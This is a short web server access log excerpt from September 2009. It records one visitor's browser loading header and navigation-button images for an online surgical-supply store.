88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:11 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
